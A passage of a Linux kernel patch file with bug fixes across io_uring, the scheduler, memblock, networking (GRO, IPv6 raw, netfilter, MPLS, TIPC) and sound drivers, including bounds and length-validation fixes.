+ 	struct io_ring_ctx *ctx = req->ctx;
+-	int v, ret;
++	int v;
+ 
+ 	/* req->task == current here, checking PF_EXITING is safe */
+ 	if (unlikely(req->task->flags & PF_EXITING))
+@@ -274,10 +275,15 @@ static int io_poll_check_events(struct io_kiocb *req, bool *locked)
+ 		if (!req->cqe.res) {
+ 			struct poll_table_struct pt = { ._key = req->apoll_events };
+ 			req->cqe.res = vfs_poll(req->file, &pt) & req->apoll_events;
++			/*
++			 * We got woken with a mask, but someone else got to
++			 * it first. The above vfs_poll() doesn't add us back
++			 * to the waitqueue, so if we get nothing back, we
++			 * should be safe and attempt a reissue.
++			 */
++			if (unlikely(!req->cqe.res))
++				return IOU_POLL_REISSUE;
+ 		}
+-
+-		if ((unlikely(!req->cqe.res)))
+-			continue;
+ 		if (req->apoll_events & EPOLLONESHOT)
+ 			return IOU_POLL_DONE;
+ 		if (io_is_uring_fops(req->file))
+@@ -294,7 +300,7 @@ static int io_poll_check_events(struct io_kiocb *req, bool *locked)
+ 				return IOU_POLL_REMOVE_POLL_USE_RES;
+ 			}
+ 		} else {
+-			ret = io_poll_issue(req, locked);
++			int ret = io_poll_issue(req, locked);
+ 			if (ret == IOU_STOP_MULTISHOT)
+ 				return IOU_POLL_REMOVE_POLL_USE_RES;
+ 			if (ret < 0)
+@@ -325,6 +331,11 @@ static void io_poll_task_func(struct io_kiocb *req, bool *locked)
+ 	if (ret == IOU_POLL_DONE) {
+ 		struct io_poll *poll = io_kiocb_to_cmd(req, struct io_poll);
+ 		req->cqe.res = mangle_poll(req->cqe.res & poll->events);
++	} else if (ret == IOU_POLL_REISSUE) {
++		io_poll_remove_entries(req);
++		io_poll_tw_hash_eject(req, locked);
++		io_req_task_submit(req, locked);
++		return;
+ 	} else if (ret != IOU_POLL_REMOVE_POLL_USE_RES) {
+ 		req->cqe.res = ret;
+ 		req_set_fail(req);
+@@ -350,7 +361,7 @@ static void io_apoll_task_func(struct io_kiocb *req, bool *locked)
+ 
+ 	if (ret == IOU_POLL_REMOVE_POLL_USE_RES)
+ 		io_req_complete_post(req);
+-	else if (ret == IOU_POLL_DONE)
++	else if (ret == IOU_POLL_DONE || ret == IOU_POLL_REISSUE)
+ 		io_req_task_submit(req, locked);
+ 	else
+ 		io_req_complete_failed(req, ret);
+@@ -549,6 +560,14 @@ static bool io_poll_can_finish_inline(struct io_kiocb *req,
+ 	return pt->owning || io_poll_get_ownership(req);
+ }
+ 
++static void io_poll_add_hash(struct io_kiocb *req)
++{
++	if (req->flags & REQ_F_HASH_LOCKED)
++		io_poll_req_insert_locked(req);
++	else
++		io_poll_req_insert(req);
++}
++
+ /*
+  * Returns 0 when it's handed over for polling. The caller owns the requests if
+  * it returns non-zero, but otherwise should not touch it. Negative values
+@@ -607,18 +626,17 @@ static int __io_arm_poll_handler(struct io_kiocb *req,
+ 
+ 	if (mask &&
+ 	   ((poll->events & (EPOLLET|EPOLLONESHOT)) == (EPOLLET|EPOLLONESHOT))) {
+-		if (!io_poll_can_finish_inline(req, ipt))
++		if (!io_poll_can_finish_inline(req, ipt)) {
++			io_poll_add_hash(req);
+ 			return 0;
++		}
+ 		io_poll_remove_entries(req);
+ 		ipt->result_mask = mask;
+ 		/* no one else has access to the req, forget about the ref */
+ 		return 1;
+ 	}
+ 
+-	if (req->flags & REQ_F_HASH_LOCKED)
+-		io_poll_req_insert_locked(req);
+-	else
+-		io_poll_req_insert(req);
++	io_poll_add_hash(req);
+ 
+ 	if (mask && (poll->events & EPOLLET) &&
+ 	    io_poll_can_finish_inline(req, ipt)) {
+diff --git a/io_uring/rw.c b/io_uring/rw.c
+index bb47cc4da713c..6223472095d2c 100644
+--- a/io_uring/rw.c
++++ b/io_uring/rw.c
+@@ -1055,7 +1055,11 @@ int io_do_iopoll(struct io_ring_ctx *ctx, bool force_nonspin)
+ 			continue;
+ 
+ 		req->cqe.flags = io_put_kbuf(req, 0);
+-		__io_fill_cqe_req(req->ctx, req);
++		if (unlikely(!__io_fill_cqe_req(ctx, req))) {
++			spin_lock(&ctx->completion_lock);
++			io_req_cqe_overflow(req);
++			spin_unlock(&ctx->completion_lock);
++		}
+ 	}
+ 
+ 	if (unlikely(!nr_events))
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 535af9fbea7b8..172ec79b66f6c 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -2587,14 +2587,43 @@ void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
+ int dup_user_cpus_ptr(struct task_struct *dst, struct task_struct *src,
+ 		      int node)
+ {
+-	if (!src->user_cpus_ptr)
++	cpumask_t *user_mask;
++	unsigned long flags;
++
++	/*
++	 * Always clear dst->user_cpus_ptr first as their user_cpus_ptr's
++	 * may differ by now due to racing.
++	 */
++	dst->user_cpus_ptr = NULL;
++
++	/*
++	 * This check is racy and losing the race is a valid situation.
++	 * It is not worth the extra overhead of taking the pi_lock on
++	 * every fork/clone.
++	 */
++	if (data_race(!src->user_cpus_ptr))
+ 		return 0;
+ 
+-	dst->user_cpus_ptr = kmalloc_node(cpumask_size(), GFP_KERNEL, node);
+-	if (!dst->user_cpus_ptr)
++	user_mask = kmalloc_node(cpumask_size(), GFP_KERNEL, node);
++	if (!user_mask)
+ 		return -ENOMEM;
+ 
+-	cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
++	/*
++	 * Use pi_lock to protect content of user_cpus_ptr
++	 *
++	 * Though unlikely, user_cpus_ptr can be reset to NULL by a concurrent
++	 * do_set_cpus_allowed().
++	 */
++	raw_spin_lock_irqsave(&src->pi_lock, flags);
++	if (src->user_cpus_ptr) {
++		swap(dst->user_cpus_ptr, user_mask);
++		cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
++	}
++	raw_spin_unlock_irqrestore(&src->pi_lock, flags);
++
++	if (unlikely(user_mask))
++		kfree(user_mask);
++
+ 	return 0;
+ }
+ 
+@@ -5469,7 +5498,9 @@ void scheduler_tick(void)
+ 	unsigned long thermal_pressure;
+ 	u64 resched_latency;
+ 
+-	arch_scale_freq_tick();
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		arch_scale_freq_tick();
++
+ 	sched_clock_tick();
+ 
+ 	rq_lock(rq, &rf);
+diff --git a/mm/memblock.c b/mm/memblock.c
+index 511d4783dcf1d..fc3d8fbd2060d 100644
+--- a/mm/memblock.c
++++ b/mm/memblock.c
+@@ -1640,7 +1640,13 @@ void __init memblock_free_late(phys_addr_t base, phys_addr_t size)
+ 	end = PFN_DOWN(base + size);
+ 
+ 	for (; cursor < end; cursor++) {
+-		memblock_free_pages(pfn_to_page(cursor), cursor, 0);
++		/*
++		 * Reserved pages are always initialized by the end of
++		 * memblock_free_all() (by memmap_init() and, if deferred
++		 * initialization is enabled, memmap_init_reserved_pages()), so
++		 * these pages can be released directly to the buddy allocator.
++		 */
++		__free_pages_core(pfn_to_page(cursor), 0);
+ 		totalram_pages_inc();
+ 	}
+ }
+diff --git a/net/core/gro.c b/net/core/gro.c
+index bc9451743307b..1b4abfb9a7a13 100644
+--- a/net/core/gro.c
++++ b/net/core/gro.c
+@@ -489,45 +489,46 @@ static enum gro_result dev_gro_receive(struct napi_struct *napi, struct sk_buff
+ 
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(ptype, head, list) {
+-		if (ptype->type != type || !ptype->callbacks.gro_receive)
+-			continue;
+-
+-		skb_set_network_header(skb, skb_gro_offset(skb));
+-		skb_reset_mac_len(skb);
+-		BUILD_BUG_ON(sizeof_field(struct napi_gro_cb, zeroed) != sizeof(u32));
+-		BUILD_BUG_ON(!IS_ALIGNED(offsetof(struct napi_gro_cb, zeroed),
+-					 sizeof(u32))); /* Avoid slow unaligned acc */
+-		*(u32 *)&NAPI_GRO_CB(skb)->zeroed = 0;
+-		NAPI_GRO_CB(skb)->flush = skb_has_frag_list(skb);
+-		NAPI_GRO_CB(skb)->is_atomic = 1;
+-		NAPI_GRO_CB(skb)->count = 1;
+-		if (unlikely(skb_is_gso(skb))) {
+-			NAPI_GRO_CB(skb)->count = skb_shinfo(skb)->gso_segs;
+-			/* Only support TCP at the moment. */
+-			if (!skb_is_gso_tcp(skb))
+-				NAPI_GRO_CB(skb)->flush = 1;
+-		}
+-
+-		/* Setup for GRO checksum validation */
+-		switch (skb->ip_summed) {
+-		case CHECKSUM_COMPLETE:
+-			NAPI_GRO_CB(skb)->csum = skb->csum;
+-			NAPI_GRO_CB(skb)->csum_valid = 1;
+-			break;
+-		case CHECKSUM_UNNECESSARY:
+-			NAPI_GRO_CB(skb)->csum_cnt = skb->csum_level + 1;
+-			break;
+-		}
++		if (ptype->type == type && ptype->callbacks.gro_receive)
++			goto found_ptype;
++	}
++	rcu_read_unlock();
++	goto normal;
++
++found_ptype:
++	skb_set_network_header(skb, skb_gro_offset(skb));
++	skb_reset_mac_len(skb);
++	BUILD_BUG_ON(sizeof_field(struct napi_gro_cb, zeroed) != sizeof(u32));
++	BUILD_BUG_ON(!IS_ALIGNED(offsetof(struct napi_gro_cb, zeroed),
++					sizeof(u32))); /* Avoid slow unaligned acc */
++	*(u32 *)&NAPI_GRO_CB(skb)->zeroed = 0;
++	NAPI_GRO_CB(skb)->flush = skb_has_frag_list(skb);
++	NAPI_GRO_CB(skb)->is_atomic = 1;
++	NAPI_GRO_CB(skb)->count = 1;
++	if (unlikely(skb_is_gso(skb))) {
++		NAPI_GRO_CB(skb)->count = skb_shinfo(skb)->gso_segs;
++		/* Only support TCP and non DODGY users. */
++		if (!skb_is_gso_tcp(skb) ||
++		    (skb_shinfo(skb)->gso_type & SKB_GSO_DODGY))
++			NAPI_GRO_CB(skb)->flush = 1;
++	}
+ 
+-		pp = INDIRECT_CALL_INET(ptype->callbacks.gro_receive,
+-					ipv6_gro_receive, inet_gro_receive,
+-					&gro_list->list, skb);
++	/* Setup for GRO checksum validation */
++	switch (skb->ip_summed) {
++	case CHECKSUM_COMPLETE:
++		NAPI_GRO_CB(skb)->csum = skb->csum;
++		NAPI_GRO_CB(skb)->csum_valid = 1;
++		break;
++	case CHECKSUM_UNNECESSARY:
++		NAPI_GRO_CB(skb)->csum_cnt = skb->csum_level + 1;
+ 		break;
+ 	}
+-	rcu_read_unlock();
+ 
+-	if (&ptype->list == head)
+-		goto normal;
++	pp = INDIRECT_CALL_INET(ptype->callbacks.gro_receive,
++				ipv6_gro_receive, inet_gro_receive,
++				&gro_list->list, skb);
++
++	rcu_read_unlock();
+ 
+ 	if (PTR_ERR(pp) == -EINPROGRESS) {
+ 		ret = GRO_CONSUMED;
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index 722de9dd0ff78..8ffeac7456567 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -505,6 +505,7 @@ csum_copy_err:
+ static int rawv6_push_pending_frames(struct sock *sk, struct flowi6 *fl6,
+ 				     struct raw6_sock *rp)
+ {
++	struct ipv6_txoptions *opt;
+ 	struct sk_buff *skb;
+ 	int err = 0;
+ 	int offset;
+@@ -522,6 +523,9 @@ static int rawv6_push_pending_frames(struct sock *sk, struct flowi6 *fl6,
+ 
+ 	offset = rp->offset;
+ 	total_len = inet_sk(sk)->cork.base.length;
++	opt = inet6_sk(sk)->cork.opt;
++	total_len -= opt ? opt->opt_flen : 0;
++
+ 	if (offset >= total_len - 1) {
+ 		err = -EINVAL;
+ 		ip6_flush_pending_frames(sk);
+diff --git a/net/netfilter/ipset/ip_set_bitmap_ip.c b/net/netfilter/ipset/ip_set_bitmap_ip.c
+index a8ce04a4bb72a..e4fa00abde6a2 100644
+--- a/net/netfilter/ipset/ip_set_bitmap_ip.c
++++ b/net/netfilter/ipset/ip_set_bitmap_ip.c
+@@ -308,8 +308,8 @@ bitmap_ip_create(struct net *net, struct ip_set *set, struct nlattr *tb[],
+ 			return -IPSET_ERR_BITMAP_RANGE;
+ 
+ 		pr_debug("mask_bits %u, netmask %u\n", mask_bits, netmask);
+-		hosts = 2 << (32 - netmask - 1);
+-		elements = 2 << (netmask - mask_bits - 1);
++		hosts = 2U << (32 - netmask - 1);
++		elements = 2UL << (netmask - mask_bits - 1);
+ 	}
+ 	if (elements > IPSET_BITMAP_MAX_RANGE + 1)
+ 		return -IPSET_ERR_BITMAP_RANGE_SIZE;
+diff --git a/net/netfilter/nft_payload.c b/net/netfilter/nft_payload.c
+index 4edd899aeb9bb..d7de2ecb287eb 100644
+--- a/net/netfilter/nft_payload.c
++++ b/net/netfilter/nft_payload.c
+@@ -62,7 +62,7 @@ nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
+ 			return false;
+ 
+ 		if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
+-			ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
++			ethlen -= offset + len - VLAN_ETH_HLEN - vlan_hlen;
+ 
+ 		memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);
+ 
+diff --git a/net/sched/act_mpls.c b/net/sched/act_mpls.c
+index 8ad25cc8ccd55..ea5959094adb0 100644
+--- a/net/sched/act_mpls.c
++++ b/net/sched/act_mpls.c
+@@ -132,6 +132,11 @@ static int valid_label(const struct nlattr *attr,
+ {
+ 	const u32 *label = nla_data(attr);
+ 
++	if (nla_len(attr) != sizeof(*label)) {
++		NL_SET_ERR_MSG_MOD(extack, "Invalid MPLS label length");
++		return -EINVAL;
++	}
++
+ 	if (*label & ~MPLS_LABEL_MASK || *label == MPLS_LABEL_IMPLNULL) {
+ 		NL_SET_ERR_MSG_MOD(extack, "MPLS label out of range");
+ 		return -EINVAL;
+@@ -143,7 +148,8 @@ static int valid_label(const struct nlattr *attr,
+ static const struct nla_policy mpls_policy[TCA_MPLS_MAX + 1] = {
+ 	[TCA_MPLS_PARMS]	= NLA_POLICY_EXACT_LEN(sizeof(struct tc_mpls)),
+ 	[TCA_MPLS_PROTO]	= { .type = NLA_U16 },
+-	[TCA_MPLS_LABEL]	= NLA_POLICY_VALIDATE_FN(NLA_U32, valid_label),
++	[TCA_MPLS_LABEL]	= NLA_POLICY_VALIDATE_FN(NLA_BINARY,
++							 valid_label),
+ 	[TCA_MPLS_TC]		= NLA_POLICY_RANGE(NLA_U8, 0, 7),
+ 	[TCA_MPLS_TTL]		= NLA_POLICY_MIN(NLA_U8, 1),
+ 	[TCA_MPLS_BOS]		= NLA_POLICY_RANGE(NLA_U8, 0, 1),
+diff --git a/net/tipc/node.c b/net/tipc/node.c
+index 49ddc484c4fe7..5e000fde80676 100644
+--- a/net/tipc/node.c
++++ b/net/tipc/node.c
+@@ -1179,8 +1179,9 @@ void tipc_node_check_dest(struct net *net, u32 addr,
+ 	bool addr_match = false;
+ 	bool sign_match = false;
+ 	bool link_up = false;
++	bool link_is_reset = false;
+ 	bool accept_addr = false;
+-	bool reset = true;
++	bool reset = false;
+ 	char *if_name;
+ 	unsigned long intv;
+ 	u16 session;
+@@ -1200,14 +1201,14 @@ void tipc_node_check_dest(struct net *net, u32 addr,
+ 	/* Prepare to validate requesting node's signature and media address */
+ 	l = le->link;
+ 	link_up = l && tipc_link_is_up(l);
++	link_is_reset = l && tipc_link_is_reset(l);
+ 	addr_match = l && !memcmp(&le->maddr, maddr, sizeof(*maddr));
+ 	sign_match = (signature == n->signature);
+ 
+ 	/* These three flags give us eight permutations: */
+ 
+ 	if (sign_match && addr_match && link_up) {
+-		/* All is fine. Do nothing. */
+-		reset = false;
++		/* All is fine. Ignore requests. */
+ 		/* Peer node is not a container/local namespace */
+ 		if (!n->peer_hash_mix)
+ 			n->peer_hash_mix = hash_mixes;
+@@ -1232,6 +1233,7 @@ void tipc_node_check_dest(struct net *net, u32 addr,
+ 		 */
+ 		accept_addr = true;
+ 		*respond = true;
++		reset = true;
+ 	} else if (!sign_match && addr_match && link_up) {
+ 		/* Peer node rebooted. Two possibilities:
+ 		 *  - Delayed re-discovery; this link endpoint has already
+@@ -1263,6 +1265,7 @@ void tipc_node_check_dest(struct net *net, u32 addr,
+ 		n->signature = signature;
+ 		accept_addr = true;
+ 		*respond = true;
++		reset = true;
+ 	}
+ 
+ 	if (!accept_addr)
+@@ -1291,6 +1294,7 @@ void tipc_node_check_dest(struct net *net, u32 addr,
+ 		tipc_link_fsm_evt(l, LINK_RESET_EVT);
+ 		if (n->state == NODE_FAILINGOVER)
+ 			tipc_link_fsm_evt(l, LINK_FAILOVER_BEGIN_EVT);
++		link_is_reset = tipc_link_is_reset(l);
+ 		le->link = l;
+ 		n->link_cnt++;
+ 		tipc_node_calculate_timer(n, l);
+@@ -1303,7 +1307,7 @@ void tipc_node_check_dest(struct net *net, u32 addr,
+ 	memcpy(&le->maddr, maddr, sizeof(*maddr));
+ exit:
+ 	tipc_node_write_unlock(n);
+-	if (reset && l && !tipc_link_is_reset(l))
++	if (reset && !link_is_reset)
+ 		tipc_node_link_down(n, b->identity, false);
+ 	tipc_node_put(n);
+ }
+diff --git a/sound/core/control_led.c b/sound/core/control_led.c
+index f975cc85772bb..3cadd40100f3e 100644
+--- a/sound/core/control_led.c
++++ b/sound/core/control_led.c
+@@ -530,12 +530,11 @@ static ssize_t set_led_id(struct snd_ctl_led_card *led_card, const char *buf, si
+ 			  bool attach)
+ {
+ 	char buf2[256], *s, *os;
+-	size_t len = max(sizeof(s) - 1, count);
+ 	struct snd_ctl_elem_id id;
+ 	int err;
+ 
+-	strncpy(buf2, buf, len);
+-	buf2[len] = '\0';
++	if (strscpy(buf2, buf, sizeof(buf2)) < 0)
++		return -E2BIG;
+ 	memset(&id, 0, sizeof(id));
+ 	id.iface = SNDRV_CTL_ELEM_IFACE_MIXER;
+ 	s = buf2;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 764eb07bbaff4..6fab7c8fc19ae 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -3564,6 +3564,15 @@ static void alc256_init(struct hda_codec *codec)
+ 	hda_nid_t hp_pin = alc_get_hp_pin(spec);
+ 	bool hp_pin_sense;
+ 
++	if (spec->ultra_low_power) {
++		alc_update_coef_idx(codec, 0x03, 1<<1, 1<<1);
++		alc_update_coef_idx(codec, 0x08, 3<<2, 3<<2);
++		alc_update_coef_idx(codec, 0x08, 7<<4, 0);
++		alc_update_coef_idx(codec, 0x3b, 1<<15, 0);
++		alc_update_coef_idx(codec, 0x0e, 7<<6, 7<<6);
++		msleep(30);
++	}
++
+ 	if (!hp_pin)
+ 		hp_pin = 0x21;
+ 
+@@ -3575,14 +3584,6 @@ static void alc256_init(struct hda_codec *codec)
+ 		msleep(2);
+ 
+ 	alc_update_coefex_idx(codec, 0x57, 0x04, 0x0007, 0x1); /* Low power */
+-	if (spec->ultra_low_power) {
+-		alc_update_coef_idx(codec, 0x03, 1<<1, 1<<1);
+-		alc_update_coef_idx(codec, 0x08, 3<<2, 3<<2);
+-		alc_update_coef_idx(codec, 0x08, 7<<4, 0);
+-		alc_update_coef_idx(codec, 0x3b, 1<<15, 0);
+-		alc_update_coef_idx(codec, 0x0e, 7<<6, 7<<6);
+-		msleep(30);
+-	}
+ 
+ 	snd_hda_codec_write(codec, hp_pin, 0,
+ 			    AC_VERB_SET_AMP_GAIN_MUTE, AMP_OUT_MUTE);
+@@ -3713,6 +3714,13 @@ static void alc225_init(struct hda_codec *codec)
+ 	hda_nid_t hp_pin = alc_get_hp_pin(spec);
+ 	bool hp1_pin_sense, hp2_pin_sense;
+ 
++	if (spec->ultra_low_power) {
++		alc_update_coef_idx(codec, 0x08, 0x0f << 2, 3<<2);
++		alc_update_coef_idx(codec, 0x0e, 7<<6, 7<<6);
++		alc_update_coef_idx(codec, 0x33, 1<<11, 0);
++		msleep(30);
++	}
++
+ 	if (spec->codec_variant != ALC269_TYPE_ALC287 &&
+ 		spec->codec_variant != ALC269_TYPE_ALC245)
+ 		/* required only at boot or S3 and S4 resume time */
+@@ -3734,12 +3742,6 @@ static void alc225_init(struct hda_codec *codec)
+ 		msleep(2);
+ 
+ 	alc_update_coefex_idx(codec, 0x57, 0x04, 0x0007, 0x1); /* Low power */
+-	if (spec->ultra_low_power) {
+-		alc_update_coef_idx(codec, 0x08, 0x0f << 2, 3<<2);
+-		alc_update_coef_idx(codec, 0x0e, 7<<6, 7<<6);
+-		alc_update_coef_idx(codec, 0x33, 1<<11, 0);
+-		msleep(30);
+-	}
+ 
+ 	if (hp1_pin_sense || spec->ultra_low_power)
+ 		snd_hda_codec_write(codec, hp_pin, 0,
+@@ -4644,6 +4646,16 @@ static void alc285_fixup_hp_coef_micmute_led(struct hda_codec *codec,
+ 	}
+ }
+ 
++static void alc285_fixup_hp_gpio_micmute_led(struct hda_codec *codec,
++				const struct hda_fixup *fix, int action)
++{
++	struct alc_spec *spec = codec->spec;
++
++	if (action == HDA_FIXUP_ACT_PRE_PROBE)
++		spec->micmute_led_polarity = 1;
++	alc_fixup_hp_gpio_led(codec, action, 0, 0x04);
++}
++
+ static void alc236_fixup_hp_coef_micmute_led(struct hda_codec *codec,
+ 				const struct hda_fixup *fix, int action)
+ {
+@@ -4665,6 +4677,13 @@ static void alc285_fixup_hp_mute_led(struct hda_codec *codec,
+ 	alc285_fixup_hp_coef_micmute_led(codec, fix, action);
+ }
+ 
++static void alc285_fixup_hp_spectre_x360_mute_led(struct hda_codec *codec,
++				const struct hda_fixup *fix, int action)
++{
++	alc285_fixup_hp_mute_led_coefbit(codec, fix, action);
++	alc285_fixup_hp_gpio_micmute_led(codec, fix, action);
++}
++
+ static void alc236_fixup_hp_mute_led(struct hda_codec *codec,
+ 				const struct hda_fixup *fix, int action)
+ {
+@@ -7106,6 +7125,7 @@ enum {
+ 	ALC285_FIXUP_ASUS_G533Z_PINS,
+ 	ALC285_FIXUP_HP_GPIO_LED,
+ 	ALC285_FIXUP_HP_MUTE_LED,
++	ALC285_FIXUP_HP_SPECTRE_X360_MUTE_LED,
+ 	ALC236_FIXUP_HP_GPIO_LED,
+ 	ALC236_FIXUP_HP_MUTE_LED,
+ 	ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF,
+@@ -8486,6 +8506,10 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc285_fixup_hp_mute_led,
+ 	},
++	[ALC285_FIXUP_HP_SPECTRE_X360_MUTE_LED] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc285_fixup_hp_spectre_x360_mute_led,
++	},
+ 	[ALC236_FIXUP_HP_GPIO_LED] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc236_fixup_hp_gpio_led,
+@@ -9328,6 +9352,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x86c7, "HP Envy AiO 32", ALC274_FIXUP_HP_ENVY_GPIO),
+ 	SND_PCI_QUIRK(0x103c, 0x86e7, "HP Spectre x360 15-eb0xxx", ALC285_FIXUP_HP_SPECTRE_X360_EB1),
+ 	SND_PCI_QUIRK(0x103c, 0x86e8, "HP Spectre x360 15-eb0xxx", ALC285_FIXUP_HP_SPECTRE_X360_EB1),
++	SND_PCI_QUIRK(0x103c, 0x86f9, "HP Spectre x360 13-aw0xxx", ALC285_FIXUP_HP_SPECTRE_X360_MUTE_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8716, "HP Elite Dragonfly G2 Notebook PC", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8720, "HP EliteBook x360 1040 G8 Notebook PC", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8724, "HP EliteBook 850 G7", ALC285_FIXUP_HP_GPIO_LED),
+diff --git a/sound/soc/codecs/rt9120.c b/sound/soc/codecs/rt9120.c
+index 644300e88b4c5..fcf4fbaed3c76 100644
+--- a/sound/soc/codecs/rt9120.c
++++ b/sound/soc/codecs/rt9120.c
+@@ -177,8 +177,20 @@ static int rt9120_codec_probe(struct snd_soc_component *comp)
+ 	return 0;
+ }
+ 
++static int rt9120_codec_suspend(struct snd_soc_component *comp)
++{
++	return pm_runtime_force_suspend(comp->dev);
++}
++
++static int rt9120_codec_resume(struct snd_soc_component *comp)
++{
++	return pm_runtime_force_resume(comp->dev);
++}
++
+ static const struct snd_soc_component_driver rt9120_component_driver = {
+ 	.probe = rt9120_codec_probe,
++	.suspend = rt9120_codec_suspend,
++	.resume = rt9120_codec_resume,
+ 	.controls = rt9120_snd_controls,
+ 	.num_controls = ARRAY_SIZE(rt9120_snd_controls),
+ 	.dapm_widgets = rt9120_dapm_widgets,
+diff --git a/sound/soc/codecs/wm8904.c b/sound/soc/codecs/wm8904.c
+index ca6a01a230af4..791d8738d1c0e 100644
+--- a/sound/soc/codecs/wm8904.c
++++ b/sound/soc/codecs/wm8904.c
+@@ -697,6 +697,7 @@ static int out_pga_event(struct snd_soc_dapm_widget *w,
+ 	int dcs_mask;
+ 	int dcs_l, dcs_r;
+ 	int dcs_l_reg, dcs_r_reg;
++	int an_out_reg;
+ 	int timeout;
+ 	int pwr_reg;
+ 
+@@ -712,6 +713,7 @@ static int out_pga_event(struct snd_soc_dapm_widget *w,
+ 		dcs_mask = WM8904_DCS_ENA_CHAN_0 | WM8904_DCS_ENA_CHAN_1;
+ 		dcs_r_reg = WM8904_DC_SERVO_8;
+ 		dcs_l_reg = WM8904_DC_SERVO_9;
++		an_out_reg = WM8904_ANALOGUE_OUT1_LEFT;
+ 		dcs_l = 0;
+ 		dcs_r = 1;
+ 		break;
+@@ -720,6 +722,7 @@ static int out_pga_event(struct snd_soc_dapm_widget *w,
+ 		dcs_mask = WM8904_DCS_ENA_CHAN_2 | WM8904_DCS_ENA_CHAN_3;
+ 		dcs_r_reg = WM8904_DC_SERVO_6;
+ 		dcs_l_reg = WM8904_DC_SERVO_7;
++		an_out_reg = WM8904_ANALOGUE_OUT2_LEFT;
+ 		dcs_l = 2;
+ 		dcs_r = 3;
+ 		break;
+@@ -792,6 +795,10 @@ static int out_pga_event(struct snd_soc_dapm_widget *w,
+ 		snd_soc_component_update_bits(component, reg,
+ 				    WM8904_HPL_ENA_OUTP | WM8904_HPR_ENA_OUTP,
+ 				    WM8904_HPL_ENA_OUTP | WM8904_HPR_ENA_OUTP);
++
++		/* Update volume, requires PGA to be powered */
++		val = snd_soc_component_read(component, an_out_reg);
++		snd_soc_component_write(component, an_out_reg, val);
+ 		break;
+ 
+ 	case SND_SOC_DAPM_POST_PMU:
+diff --git a/sound/soc/intel/boards/Kconfig b/sound/soc/intel/boards/Kconfig
+index aa12d7e3dd2f9..ca49cc49c378c 100644
+--- a/sound/soc/intel/boards/Kconfig
++++ b/sound/soc/intel/boards/Kconfig
+@@ -558,6 +558,7 @@ config SND_SOC_INTEL_SOF_NAU8825_MACH
+ 	select SND_SOC_HDAC_HDMI
+ 	select SND_SOC_INTEL_HDA_DSP_COMMON
+ 	select SND_SOC_INTEL_SOF_MAXIM_COMMON
++	select SND_SOC_INTEL_SOF_REALTEK_COMMON
+ 	help
+ 	   This adds support for ASoC machine driver for SOF platforms
+ 	   with nau8825 codec.
+diff --git a/sound/soc/intel/boards/sof_nau8825.c b/sound/soc/intel/boards/sof_nau8825.c
+index 5585c217f78d3..009a41fbefa10 100644
+--- a/sound/soc/intel/boards/sof_nau8825.c
++++ b/sound/soc/intel/boards/sof_nau8825.c
+@@ -47,6 +47,7 @@
+ #define SOF_RT1019P_SPEAKER_AMP_PRESENT	BIT(14)
+ #define SOF_MAX98373_SPEAKER_AMP_PRESENT	BIT(15)
+ #define SOF_MAX98360A_SPEAKER_AMP_PRESENT	BIT(16)
++#define SOF_RT1015P_SPEAKER_AMP_PRESENT	BIT(17)
+ 
+ static unsigned long sof_nau8825_quirk = SOF_NAU8825_SSP_CODEC(0);
+ 
+@@ -483,6 +484,8 @@ static struct snd_soc_dai_link *sof_card_dai_links_create(struct device *dev,
+ 		} else if (sof_nau8825_quirk &
+ 				SOF_MAX98360A_SPEAKER_AMP_PRESENT) {
+ 			max_98360a_dai_link(&links[id]);
++		} else if (sof_nau8825_quirk & SOF_RT1015P_SPEAKER_AMP_PRESENT) {
++			sof_rt1015p_dai_link(&links[id]);
+ 		} else {
+ 			goto devm_err;
+ 		}
+@@ -576,6 +579,8 @@ static int sof_audio_probe(struct platform_device *pdev)
+ 
+ 	if (sof_nau8825_quirk & SOF_MAX98373_SPEAKER_AMP_PRESENT)
+ 		max_98373_set_codec_conf(&sof_audio_card_nau8825);
++	else if (sof_nau8825_quirk & SOF_RT1015P_SPEAKER_AMP_PRESENT)
++		sof_rt1015p_codec_conf(&sof_audio_card_nau8825);
+ 
+ 	if (sof_nau8825_quirk & SOF_SSP_BT_OFFLOAD_PRESENT)
+ 		sof_audio_card_nau8825.num_links++;
+@@ -613,7 +618,7 @@ static const struct platform_device_id board_ids[] = {
+ 
+ 	},
+ 	{
+-		.name = "adl_rt1019p_nau8825",
++		.name = "adl_rt1019p_8825",
+ 		.driver_data = (kernel_ulong_t)(SOF_NAU8825_SSP_CODEC(0) |
+ 					SOF_SPEAKER_AMP_PRESENT |
+ 					SOF_RT1019P_SPEAKER_AMP_PRESENT |
+@@ -621,7 +626,7 @@ static const struct platform_device_id board_ids[] = {
+ 					SOF_NAU8825_NUM_HDMIDEV(4)),
+ 	},
+ 	{
+-		.name = "adl_max98373_nau8825",
++		.name = "adl_max98373_8825",
+ 		.driver_data = (kernel_ulong_t)(SOF_NAU8825_SSP_CODEC(0) |
+ 					SOF_SPEAKER_AMP_PRESENT |
